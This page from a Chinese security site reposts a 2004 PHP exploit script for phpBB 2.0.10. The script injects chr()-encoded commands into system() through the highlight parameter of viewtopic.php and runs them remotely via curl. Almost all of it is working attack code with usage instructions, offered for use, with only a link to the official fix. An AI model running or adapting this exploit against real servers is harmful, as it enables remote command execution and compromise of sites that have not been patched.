首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
phpBB highlight parameter Processing Remote Execution Exploit
来源:www.scan-associates.net 作者:pokleyzz 发布时间:2004-11-21  

phpBB highlight parameter Processing Remote Execution Exploit

-> Official fix Here


#!/usr/bin/php -q
<?php
/*
# phpBB 2.0.10 execute command by pokleyzz <pokleyzz at scan-associates.net>
# 15th November 2004 : 4:04 a.m
#
# bug found by How Dark (www howdark com) (1st October 2004)
#
# Requirement:
#
# PHP 4.x with curl extension;
#
# ** Selamat Hari Raya **
*/

if (!(function_exists('curl_init'))) {
echo "cURL extension required\n";
exit;
}

if ($argv[2]){
$url = $argv[1];
$command = $argv[2];
}
else {
echo "Usage: ".$argv[0]." <URL> <command> [topic id] [proxy]\n\n";
echo "\tURL\t URL to phpnBB site (ex: http://127.0.0.1/html)\n";
echo "\tcommand\t command to execute on server (ex: 'ls -la')\n";
echo "\ttopic_id\t topic id\n";
echo "\tproxy\t optional proxy url (ex: http://10.10.10.10:8080)\n";
exit;
}
if ($argv[3])
$topic = $argv[3];
else
$topic = 1;

if ($argv[4])
$proxy = $argv[4];


$cmd = str2chr($command);

$action = "/viewtopic.php?t=$topic&highlight=%2527%252esystem(".$cmd." )%252e%2527";
$ch=curl_init();
if ($proxy){
curl_setopt($ch, CURLOPT_PROXY,$proxy);
}
curl_setopt($ch, CURLOPT_URL,$url.$action);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$res=curl_exec ($ch);
curl_close ($ch);
echo $res;

function str2chr($str){

for($i = 0;$i < strlen($str);$i++){
$chr .= "chr(".ord($str{$i}).")";
if ($i != strlen($str) -1)
$chr .= "%252e";
}
return $chr;
}
?>



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·TWiki 20030201 search.pm Remot
·CoffeeCup FTP Clients Remote B
·Java JNI/DNS Queries DoS
·WeOnlyDo! COM Ftp DELUXE Activ
·Technote remote command execut
·phpBB highlight parameter Proc
·Cscope version 15.5 and minor
·Invision Power Board v2.0.0 -
·Secure Network Messenger DoS E
·ProZilla <= 1.3.6 Format st
·Orginal Advisory and exploit b
·DMS POP3 Remote BufferOverflow
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved